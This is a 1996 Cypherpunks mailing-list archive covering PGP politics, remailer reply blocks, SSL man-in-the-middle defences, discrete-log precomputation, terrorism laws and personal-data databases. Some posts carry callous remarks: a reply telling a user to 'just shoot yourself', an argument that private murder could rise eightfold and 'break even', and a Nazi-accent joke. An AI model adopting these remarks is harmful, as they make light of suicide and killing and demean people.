to protect their people overseas. "PGP has spread like a prairie fire, fanned by countless people who fervently want their privacy restored in the information age," says Zimmermann. Unfortunately, email messages are too easy to intercept and scan for interesting keywords, such as "revolution" or "abortion." This "fishing" can be done routinely and invisibly on a grand scale. When most of the population becomes reliant on email, the government will be able to do "driftnet fishing" -- making a quantitative and qualitative Orwellian difference to the health of democracy, Zimmermann said. Law enforcement and intelligence interests in the government have attempted many times to suppress the availability of strong domestic encryption technology. However, Zimmermann doubts their chances for success. He says, "The rest of the world uses encryption and they laugh at the US because we are railing against nature, trying to stop encoding messages. Trying to stop this is like the buggy whip manufacturers trying to stop the adoption of cars -- even with the NSA and the FBI on the government side, it's still impossible. The information revolution is good for democracy -- good for a free market and trade." "The government has a track record that does not inspire confidence that they will never abuse our civil liberties," says Zimmermann, who is now Chairman of the Board and Chief Technology Officer for Pretty Good Privacy, Inc. (PGP). For more information on the conference or the Wiener Award, contact CPSR at 415-322-3778, 703-739-9320, cpsrannmtg at cpsr.org, http://www.cpsr.org/home.html. -- Susan Evoy * Deputy Director http://www.cpsr.org/home.html Computer Professionals for Social Responsibility P.O. Box 717 * Palo Alto * CA * 94302 Phone: (415) 322-3778 * Fax: (415) 322-4748 * Email: evoy at cpsr.org * From perry at piermont.com Mon Sep 9 20:45:33 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 10 Sep 1996 11:45:33 +0800 Subject: Imminent Death of the Internet, GIF at 11 In-Reply-To: Message-ID: <199609092203.SAA25379@jekyll.piermont.com> Simon Spero writes: > Remember, though - TCPs initial estimate of the congestion window is > never less than one packet, large numbers of opening connections can > still (I think) lead to congestion collapse. It can defnitely get close > to it. Sure. TCP, especially without SACK but even with such schemes, more or less requires an average of no less than one packet per RTT. However, the other half of what I said is that bandwidth *is* rising. Perry From pjn at nworks.com Mon Sep 9 20:48:23 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:48:23 +0800 Subject: Message-ID: -=> Quoting Int:snow at smoke.suba.com to P.j. <=- In> On Thu, 5 Sep 1996 pjn at nworks.com wrote: > In> what do you know about hackers > > More than you appariently... > In> Which isn't necessarily all that much. Not for him... P.J. pjn at nworks.com ... Be wary of strong drink. It can make you shoot at tax collectors and m ___ Blue Wave/QWK v2.20 [NR] From pjn at nworks.com Mon Sep 9 20:59:41 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:59:41 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ ! Message-ID: In> I really need help unsubscribing from the Cypherpunks list! it is In> imperative! Just shoot yourself and it will all go away. . . P.J. pjn at nworks.com ... Exercise your right to arm and keep bears! ___ Blue Wave/QWK v2.20 [NR] From frantz at netcom.com Mon Sep 9 21:00:58 1996 From: frantz at netcom.com (Bill Frantz) Date: Tue, 10 Sep 1996 12:00:58 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: <199609092316.QAA24498@netcom6.netcom.com> On Sun, 8 Sep 1996, Lance Cottrell wrote: > Mixmaster prevents replay, so flooding multiple copies of a single message > will not work. This is the reason Mixmaster has no reply block feature. I > can see two ways in which replies can work safely. To paraphrase John Von Neumann, any system which uses reply blocks is in a state of sin. By this I mean that if there is a chain pointing at you, a sufficiently powerful attacker can walk down that chain and find you. Given that, I will join the state of sin by proposing a mechanism which will allow Alice to receive a reply from Bob, but change her mind at any time. The basic idea is to have a one-time reply block which either Bob or Alice can send to. If Alice thinks that too much time has elapsed, and powerful enemies are walking down her reply block chain, she can send herself a reply and break the chain. (She might send a reply thru each link in the chain to break all the links.) It also occurs to me that since email addresses are about the same size as secure symmetric keys, it would be attractive to use real one time pads instead of symmetric key cyphers for encrypting them. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From tcmay at got.net Mon Sep 9 21:20:47 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 12:20:47 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: At 6:16 PM 9/9/96, snow wrote: > Then again, the only reason I am not a terrorist is that the government >hasn't YET defined hate speach directed against the government to be >terrorism. Don't be so hasty in saying this. A couple of months ago Clinton signed some sort of bill having to do with terrorism, terrorist organizations, funding of same, and deportation of alien-units suspected of being allied with terrorist organizations. (I seem to recall another such act being passed in early 1995, so there may be more than one of these things...) Given the mounting hysteria about terrorism (by the government, at least), and given the various laws on the books, I would not be surprised to see some Web sites prosecuted as "harboring" terrorists terrorist-symps. If any of you are not citizens of the U.S., and are here on visas, I would give this some real serious thought. Of course, maybe deportation is a blessing in disguise. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From erehwon at c2.net Mon Sep 9 21:23:28 1996 From: erehwon at c2.net (William Knowles) Date: Tue, 10 Sep 1996 12:23:28 +0800 Subject: Yahoo!'s Picks of the Week (September 9, 1996) In-Reply-To: Message-ID: Did anyone else catch this one? > Welcome to this week's selection of Picks, declassified and hot off > the press thanks to the Freedom of Information Act. Well, okay, not > really. But we like to pretend. On the other hand, if you would like > to peruse what once was private but now is public (in a federal > government sense of the word), head on over to The National Security > Archive. An independent, non-governmental research institute and > library, the NSArchive is where you'll find declassified > U.S. documents that shed light on anything from the Nixon-Presley > Meeting (Elvis wanted to be a Federal Agent at Large!) to the Cuban > Missile Crisis and a handful of White House e-mail in-between. > > http://www.seas.gwu.edu/nsarchive/ William Knowles erehwon at c2.net -- William Knowles PGP mail welcome & prefered / KeyID 1024/2C34BCF9 PGP Fingerprint 55 0C 78 3C C9 C4 44 DE 5A 3C B4 60 9C 00 FB BD Finger for public key -- Vote Harry Browne for President -- http://www.HarryBrowne96.org From drose at AZStarNet.com Mon Sep 9 22:12:04 1996 From: drose at AZStarNet.com (David M. Rose) Date: Tue, 10 Sep 1996 13:12:04 +0800 Subject: ... subversive leftists Message-ID: <199609100157.SAA12409@web.azstarnet.com> Tim May wrote: >As to the "Reichskommander," in our country, and on the Net, such jokes are >not illegal. I rather suspect they are in Germany, either the DDR or the >Western side. > >As to "tasteless and insulting," a matter of personal perspective. I find >it helpful to call a spade a spade, and others apparently do as well. Ja, Ja. Das ist gut. Ve make chust a little choke now. VERE ARE YOUR PAPERSS!? ___ David M. Rose "Theft is...a heinous crime, property representing as it does a goodly proportion of a man's life-effort: ergo, his vital force. Property is life; ...do not steal". --J.H. Vance From ericm at lne.com Mon Sep 9 22:28:23 1996 From: ericm at lne.com (Eric Murray) Date: Tue, 10 Sep 1996 13:28:23 +0800 Subject: BoS: Can you trust your ISP ?? In-Reply-To: <3234A158.3492@adv.es> Message-ID: <199609100149.SAA16682@slack.lne.com> I~nigo Gonzalez writes: > > Hello, > I'm thinking about how can I get rid off this kind of attack *before* it > happens. Can you please send me your comments about this? I don't know so > much about the how SSL works, but I think this is something that can > happen... [classic Man-in-the-Middle attack] What you described is the Man In The Middle attack, often abbreviated on these lists as MITM. The fact that there's an abbreviation for it should indicate to you how often it is discussed. However it's also one of the first problems (besides the basic encryption) that protocol designers think of. It's been taken care of in SSL3- the server's certificate must be signed by a CA that the client trusts. Unless the digital signature can be spoofed, and it probably can't be, the client can be certain that the server certificate it got is really from the server that it claims to be from. Assuming that RSA still can't be broken, the client can be sure that the pre-master-key material that it sends to the server (and which is the basis for the symmetric crypto session keys) will not be compromised. If you grab a copy of the SSL3 spec (from netscape's web site) and read the appendicies there's more good stuff about possible attacks and what's been done to counter them. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm Principal, LNE Consulting: SSL, crypto applications, Internet security. PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From smith at sctc.com Mon Sep 9 22:32:26 1996 From: smith at sctc.com (Rick Smith) Date: Tue, 10 Sep 1996 13:32:26 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: <199609092229.RAA16420@shade.sctc.com> Wouldn't the model fit reality better if it were based on biological analogies instead of the raw physics of energy? I recognize there's a desire here to put some controls on one's own equipment ("I don't want to receive spam if I don't want to") and that physics provides the conceptual lever to argue in favor of the desired controls. Biological systems are a poor choice for grained control by people who like to change their minds. But the Internet really is more like an ecology with its own complex notion of "emergent order" than a simple physical process that must obey conservation laws in some narrow fashion. Trees obey physical conservation laws, but they don't exchange micropayments with soil, air, and Sun to ensure the balance is preserved. As things get out of balance, trees die. Other entities flourish. I can't imagine the mechanism by which very precise access charging and cost recovery mechanisms would replace the current "free" model. As we all know, it's not really "free." Information is published and made available because the vendor needs to distribute it and finds the Internet to be a cheap way to make it available. Many vendors exchange information and entertainment for your attention to a commercial message. As long as there are unmetered 'Net resources (and they're unmetered for a plethora of reasons) you'll never get rid of free riders. I think you have to choose between the relatively lawless open world or an enclave where you bar the door with your favorite security measures. You allow spam as long as you allow uninvited guests. And what is cypherpunks but a continuous party of uninvited guests? Regarding these micropayment machines, I think it would be interesting to identify some existing, widely used, real world analogues to them: how big/small are individual transactions, how much money can you securely collect, how much does the mechanism cost to deploy and maintain, how hard is it to attack, etc. Gumball machines? Pop machines? Pay phones? I'm not sure there *is* a real world analogue. Rick. smith at sctc.com secure computing corporation From tcmay at got.net Mon Sep 9 22:33:59 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 13:33:59 +0800 Subject: Terrorists Message-ID: At 6:29 PM 9/9/96, Duncan Frissell wrote: >At 01:49 AM 9/9/96 -0700, Timothy C. May wrote: >>And the net effect of crypto anarchy is to destabilize and marginalize >>central governments, which is a net positive effect. If some eggs get >>broken in the process, the biological imperative will generate more eggs. >>No big deal. > >Particularly since governments murdered 160 million in the last 100 years >while we civilians have only managed to murder a paltry 20 million or fewer. >A savings of 160 million deaths leaves a lot of room for a non-harmful >increase in private murder. We could increase the private murder rate by 8 >to 10 times and still break even. > >Note too that most terrorism is aimed at governments (even if practiced on >civilians). In the absence of government, terrorist incentives may be reduced. Remember, folks, it is _governments_ which interfere with natural movements of people, capital, but not birds. I don't want to jeopardize my reputation as a List.Racist, but I think one of the longterm (not in the next 15 years) implications of the things we talk about will be the increased lowering of national borders. (Yes, I have long talked about national borders being only speed bumps...here I'm talking about _physical_ borders.) Some good insights into the "border issue" are in the current movie "Lone Star." See it to appreciate things from a Mexican's perspective, when Texas is viewed as being essentially Mexican. (Some great humor, too. And a good murder mystery. And a love story. Conspiracy, humor, murder, love...all the ingredients of a great story. All three major American races collide, and mix. No role for Asians, though. Another movie...maybe a Wayne Wang movie.) ("Lone Star" is this year's "Pulp Fiction," just as "Usual Suspects" was last year's "Pulp Fiction.") Crypto anarchy means the undermining of governments, and hence handouts to people by government. People will only move physically for physical jobs, and not for handouts. People will flow to where the jobs are, and jobs will flow to where the people are. Isn't this what we really want? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ghio at c2.net Mon Sep 9 22:35:37 1996 From: ghio at c2.net (Matthew Ghio) Date: Tue, 10 Sep 1996 13:35:37 +0800 Subject: forward secrecy in mixmaster In-Reply-To: Message-ID: <199609100232.TAA22069@infinity.c2.org> Lance Cottrell wrote: > Our options will open up alot when the patent expires next year. > I agree it does not make much difference mathematically, but one DH modulus > always makes me uneasy. DH is still patented though. I think I will continue > to use RSAREF, but compose the standard so the protocol supports unlimited > key sizes. RSAREF does not give you a license to use DH because RSA does not have a licence to use DH. So basically you can use whatever library you want and it doesn't change your position legally. I believe I read that in the Schafly-RSA-Cylink lawsuit, the judge issued an injunction barring Cylink from suing anyone else for patent infringement until the current case is resolved. The judge will probably throw out the patent - Anyone know when the next hearing in this case is? Mathematically, a common modulus does make a difference, because you can do precomputations on the modulus. This generally involves finding the discrete logarithms of many small primes modulo p. For example, if you solved (by exhaustive search) the values of a,b,c,d,e... such that, mod p, g^a=2, g^b=3, g^c=5, g^d=7, g^e=11, and so on, then you could compute the discrete logs of larger numbers by factoring them into small primes. For example, if you wanted to take the discrete log of, oh, say, 339570, that would be a+2b+c+3d+e, since 339570=2*(3^2)*5*(7^3)*11. The logarithm of a product is the sum of the logarithms of the factors. What happens if you want to take the discrete log of a number you can't factor? Let's suppose you want the discrete log of 257. Well, you can't factor that because it's prime. But, since we're working modulo p, 257=p+257. So you can try factoring p+257, or 2p+257, or 3p+257, etc. until you find a number that factors nicely into some combination of the primes that you do have. Of course, the more small primes you collect, the easier it is to find such numbers, thus the more small primes you collect, the easier it is to find more small primes. :) In light of the above, it should be apparent that users should not share a common modulus, even if they use different generators (you can take the discrete log of one generator to the other, once you crack one of them). Thus it is wise for each user to create their own prime number modulus before they generate their key. Oh, one final thing - (actually two final things) - If the modulus is not prime, and the attacker can factor the modulus, then the discrete log problem becomes somewhat easier because of the Chinese Remainder Theorem. Also, the ability to do arbitrary discrete logs modulo p, where p is a product and not prime, implies the ability to factor p. (Think about it for awhile. ;-) Overall tho, the discrete log problem is believed to be slightly harder than factoring. From sophi at best.com Mon Sep 9 22:41:57 1996 From: sophi at best.com (Greg Kucharo) Date: Tue, 10 Sep 1996 13:41:57 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: <199609100236.TAA25621@dns2.noc.best.net> >The most basic principle is this: those with resources they control (and >"own") set the rates and policies. I assume you mean this applies to both parties. The ISP has resources that I want to purchase. I have monetary resources it wants in return. Here's an idea; a contract socket. This socket negotiates a info exchange deal based on a base of variables that you have programmed it with. The exchange is made and money changes hands. Build in the usual things like reputation checking and what not to verify that the other guy meets the variables outlined(or at least can be trusted to). ??????????????????????????????????????? Greg Kucharo sophi at best.com "Eppur si moeve" -Galileo ??????????????????????????????????????? From dlv at bwalk.dm.com Mon Sep 9 23:16:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 14:16:08 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: <0DR1TD79w165w@bwalk.dm.com> snow writes: > On Mon, 9 Sep 1996, Stephan Schmidt wrote: > > > One thought : How many of you would support terrorist > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > If Iran, the IRA, etc. wanted to pay me to host a web page that > described their goals and methods, I would. > > I believe in free speach, and that means even if I disagree. > > Then again, the only reason I am not a terrorist is that the government > hasn't YET defined hate speach directed against the government to be > terrorism. You're not talking about the fascist U.S. gubment, are you? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Mon Sep 9 23:19:02 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 14:19:02 +0800 Subject: Yahoo!'s Picks of the Week (September 9, 1996) Message-ID: At 1:08 AM 9/10/96, William Knowles wrote: >Did anyone else catch this one? > >> Welcome to this week's selection of Picks, declassified and hot off >> the press thanks to the Freedom of Information Act. Well, okay, not >> really. But we like to pretend. On the other hand, if you would like >> to peruse what once was private but now is public (in a federal >> government sense of the word), head on over to The National Security >> Archive. An independent, non-governmental research institute and >> library, the NSArchive is where you'll find declassified >> U.S. documents that shed light on anything from the Nixon-Presley >> Meeting (Elvis wanted to be a Federal Agent at Large!) to the Cuban >> Missile Crisis and a handful of White House e-mail in-between. >> >> http://www.seas.gwu.edu/nsarchive/ The National Security Archive has been around for many years, and has no connection (insofar as I know or suspect) with the NSA. They have regularly supplied talking heads to various talk shows, especially six years ago during the Gulf War. (In fact, they have a leftist bias.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Mon Sep 9 23:20:10 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 14:20:10 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <56mZTD63w165w@bwalk.dm.com> Message-ID: <32349A90.51BD@gte.net> Dr.Dimitri Vulis KOTM wrote: > "Douglas B. Renner" writes: > with the investigation. Remember the World Trade Center investigation? > They knew immediately what type of vehicle the blast was in - but they > deliberately gave false information to the media. They said they were > looking into a blue stationwagon or some such BS, and the culprits > believed it! Federal agents staked out the rental agency where the > _van_ was rented from and caught one of the buggers, who thought the > investigation was way off track. Yes!!! > I recall that the perp rented the vehicle and gave a $400 cash > deposit. > He subsequently returned to the rental agency, stated that the vehicle > was stolen, and demanded his cash back. And the Oklahoma City perp was > caught speeding with no licence plates. > Shit. Whoever recruits those terrorists needs a better h.r. department > to screen for stupidity. :-) > thread is relevant. Fortunately this forum reaches some of the most > intelligent and well-informed minds on the net. > Why, thank you! > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, > 14.4Kbps Per the tendency of federal agencies to let it be publicly known that they lie openly to trap suspects (and apparently this technique has been OK'd for local enforcement as well): This is going to backfire on them (and us), and probably has already. If govt. protects its "sources and methods", however nefarious, to the extent that the public is never asked to assent to these methods (even though a few of us know about them anyway), then the public doesn't have to become overtly cynical about what's going on. On the other hand, whether you think the people have this much right to know or not, when the public consciousness embraces the concept that the police openly and regularly lie (and that it's a "good thing" they do), the result will be greater public cynicism, distrust, paranoia, hatred, and anarchy (the bad kind). From dlv at bwalk.dm.com Mon Sep 9 23:23:54 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 14:23:54 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <73q1TD77w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > As to "tasteless and insulting," a matter of personal perspective. I find > it helpful to call a spade a spade, and others apparently do as well. > Of course, Tim gets very uncomfortable when others call a spade a spade. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 9 23:24:37 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 10 Sep 1996 14:24:37 +0800 Subject: RRE: Lexis-Nexis personal information database Message-ID: <01I9AIVKYUFO9ULM12@mbcl.rutgers.edu> One wonders exactly how much of this information is compiled from government-generated sources? The SSN is automatically originally government-derived, of course... -Allen From: IN%"rre at weber.ucsd.edu" 7-SEP-1996 02:02:07.36 [Excerpt from Privacy Forum 5.17.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 3 Sep 96 12:01 PDT From: privacy at vortex.com (PRIVACY Forum) Subject: PRIVACY Forum Digest V05 #17 PRIVACY Forum Digest Tuesday, 3 September 1996 Volume 05 : Issue 17 ----------------------------------------------------------------------------- Date: Tue, 3 Sep 1996 11:22:15 -0400 (EDT) From: Larry Hunter Subject: Lexis-Nexis personal information database Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed personal information on nearly all Americans (L-N claims it contains 300 million names). This database includes name, current address, up to two previous addresses, phone number, birth-date, social security number, mother's maiden name and possible other personal information. This database is kept quite current. Through the Nexis Express service, this information could be available to any individual with a credit card. As most readers will are aware, such information could easily be used for theft of identity and other frauds. It is possible to have one's name removed from this database by making a telephone request. Call (800)543-6862, select option 4 ("all other questions") and tell the representative answering that you wish to remove your name from the Ptrax database. You may also send a fax to (513)865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933. Sending physical mail to confirm your name has been removed is always a good idea. As word of the existence of this database has spread on the net, Lexis-Nexis has been inundated with calls, and has set up a special set of operators to handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a manager responsible for this product, and is the person to whom complaints about the service could be directed. He can be reached at the above 800 number, selection option 4 and then ask for extension 3385. The information in this note has been been confirmed by me, and was originally provided in forwarded messages from Russell Whitaker, Jason Werner, Vern Winters, Katherine Florman and Reuben Snipper. Larry Hunter hunter at intr.net ------------------------------ End of PRIVACY Forum Digest 05.17 ************************ From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 9 23:25:21 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 10 Sep 1996 14:25:21 +0800 Subject: RRE: Computers, Freedom, and Privacy Message-ID: <01I9AIWML6889ULM12@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 7-SEP-1996 07:46:46.51 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 3 Sep 1996 12:37:14 -0700 (PDT) From: Bruce R Koball THE SEVENTH CONFERENCE ON COMPUTERS, FREEDOM, AND PRIVACY Call for Participation San Francisco Airport Hyatt Regency Hotel Burlingame, California March 11-14, 1997 CFP97: Commerce & Community will be sponsored by the Association for Computing Machinery SIGCOM and SIGSAC. The host institutions will be Stanford University and the University of California at Berkeley. Co-sponsors and cooperating organizations include the ACM SIGCAS, the Electronic Frontier Foundation, the Center for Democracy and Technology, the Electronic Privacy Information Center, and the WELL. CFP97: Commerce & Community is the latest in a series of annual conferences assembling a diverse group of experts and advocates from the domains of technology, business, government, and academia to explore the evolution of information and communication technologies and public policy, and its effects on freedom and privacy in the United States and throughout the world. Past CFP sessions have discussed, debated -- and often anticipated -- issues of great social import. In this tradition, CFP97: Commerce & Community will examine the social and policy questions posed by: * the growth of electronic communities; * electronic commerce and the commercialization of cyberspace; * the problems of legal and regulatory control of the Net; * the interests of privacy and property in the electronic domain; * high-tech law enforcement and security concerns. The CFP97 Program Committee invites your suggestions for presentations on these or other important issues at the nexus of technology, business, public policy, freedom, and privacy. Proposals may be for individual talks, panel discussions, debates, moot courts, moderated, interactive sessions or other formats. Each proposal should be accompanied by a one-page statement describing the topic and format. Descriptions of multi-person presentations should include a list of proposed participants and session chair. Proposals should be sent by email to cfp97 at cfp.org. If necessary, typewritten proposals may be sent to: CFP'97, 2210 Sixth Street, Berkeley, CA 94710. Please submit your proposal as soon as possible. The deadline for submissions is October 1, 1996. (Please note that we have extended our deadline for submissions) For more information on the Computers, Freedom and Privacy Conferences, as well as up-to-date announcements on CFP'97, please visit our Web page at: http://www.cfp.org cfp97_call v1.2 From perry at piermont.com Mon Sep 9 23:35:21 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 10 Sep 1996 14:35:21 +0800 Subject: Satellite Movement? In-Reply-To: <960909031224_102540.2453_HHV82-1@CompuServe.COM> Message-ID: <199609100335.XAA26422@jekyll.piermont.com> Its messages like this that make me feel happy that I no longer make reading cypherpunks an important priority in my day. Blak Dayz writes: > I was out buying groceries and after they scanned the shit through they > told me that all the ATMs in the City were out due to connection problems. So i > go home and start trying to scan for the shits and i cant find them. If anyon e > knows what the hell happened i would appreciate the details. I believe it may > have been a solar flare that caused the companies to redirect their satellite s. > It would do me alot of help considering i had to pay CASH (i hate paper) for the > stuff and i would like to complain to the fucking JPL and satt. operators abo ut > them warning the public. > > From dlv at bwalk.dm.com Mon Sep 9 23:40:04 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 14:40:04 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illumin In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > Yes, Bosnians and Serbs would not be killing each other if only they could > receive government-approved information! Why yes - they wouldn't have re-started killing each other (after a brief hiatus of about 50 years) if they had access to mass media other than the gov't controlled TV, compared to which even CNN is almost impartial. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 9 23:50:50 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 10 Sep 1996 14:50:50 +0800 Subject: Edited Edupage, 8 Sept 1996 Message-ID: <01I9AJIWWX1O9ULM12@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 9-SEP-1996 11:29:04.71 >************************************************************ >Edupage, 8 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ [...] >SCIENTOLOGISTS FIGHT FOR COPYRIGHT PROTECTION ON NET >Police investigators in Helsinki say the Internet "anonymous remailer" site >anon.penet.fi was shut down partially because of a copyright dispute with >the Church of Scientology (and not because the site was a primary conduit >for child pornography, as was previously reported). The Church of >Scientology, which has been successful in convincing the courts that its >teachings are validly copyrighted material, was pursuing an individual who >used the anonymous remailer site to post Scientology texts without the >Church's permission. The operator of the site decided to close it down >rather than reveal the individual's name to Helsinki police. The Church >says it was not opposing the existence of the server: "We have no >opposition to there being anonymity for private, consensual communications. >What we oppose is using anonymous servers for the purpose of permitting >criminal or other unlawful acts." (New York Times 6 Sep 96 C2) Why don't I believe the first portion of that statement? [...] >COPYRIGHT LAW ARCHIVED ON THE NET >The Stanford University library is working with the Council on Library >Resources to compile an electronic archive of information on copyright law >in an effort to keep educators and others aware of the ongoing debate over >the "fair use" doctrine. The Stanford site < http://fairuse.stanford.edu > >contains the full text of court decisions, legislation and international >copyright agreements, as well as related articles on the topic. (Chronicle >of Higher Education 6 Sep 96 A42) >NEW ANGLE ON WEB SURFING >BroadVision's new Web site, called The Angle, features the company's >One-To-One intelligent agent and WebPoint content management technologies. >"What intranets are looking for are ways to help users of their site get >information they need, and are entitled to, quickly and efficiently without >too much surfing," says the company's CEO, who touts his service as an >efficiency-booster for corporate technology managers. Unlike its rival, >Firefly, which is used to direct music seekers to selections they might like >based on similar buyers' tastes, the One-To-One agent software is built on >rule-based reasoning. BroadVision is considering licensing Firefly's >technology, which uses a personalization algorithm to identify trends among >users and personal tastes, to expand its offerings. (Interactive Age >Digital 4 Sep 96) [...] >CONGRESS, NOT THE COURTS, TO RESOLVE COPYRIGHT ISSUES >The U.S. Patent and Trademark Office is shifting gears in its drive to >resolve electronic copyright issues, and is now working with members of >Congress to develop a legislative solution to the issue of online service >provider liability, which has been a sticking point in efforts to pass new >copyright legislation. "We are looking for a way to define the nature of >the provision of mere telecommunications services, for which >telecommunications providers should bear no liability for copyright >infringement. We are trying to define where the dividing line is between >someone who actively engages in the provision of information versus someone >who is a mere conduit," says a senior legal counselor for the PTO. The PTO >originally believed these issues could be resolved through the court system, >but now says it will work with Congress and industry to develop legislative >solutions. (BNA Daily Report for Executives 4 Sep 96 A4) Eeep... I trust the courts more than people selected by a popularity contest. Remember that various of the worse CDA-replacement bills had in them provisions for CDA-like filtering being protected from liability? To me, that's a pretty clear government sponsorship of such filtering, which makes it censorship. [...] >WHERE WIZARDS STAY UP LATE >The NY Times Sunday Book Review says the Hafner/Lyon book on the origins of >the Internet ("Where Wizards Stay Up Late") compiles a great deal of >much-needed information and "shows just how striking an innovation and >collaboration the Arpanet really was. One central focus of the book >(excerpted in the Sep/Oct Educom Review) is the contribution of the >brilliant psychologist and computer scientist J.C.R. Licklider, who >predicted an era when "human brains and computing machines will be coupled >.... tightly, and ... the resulting partnership will think as no human brain >has ever thought and process data in a way not approached by the >information-handling machines we know today." (New York Times Book Review 8 >Sep 96 p19) >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >************************************************************ >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Niccolo Machiavelli (if your name is Niccolo Machiavelli ; otherwise, >substitute your own name). ... To cancel, send a message to: >listproc at educom.unc.edu with the message: unsubscribe edupage. (If you >have subscription problems, send mail to manager at educom.unc.edu.) From snow at smoke.suba.com Tue Sep 10 00:03:29 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 15:03:29 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Timothy C. May wrote: > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming > in this morning. I'm sure you're busy, so I'll make this as short as > possible. OK with you?" > Suspicious Persons 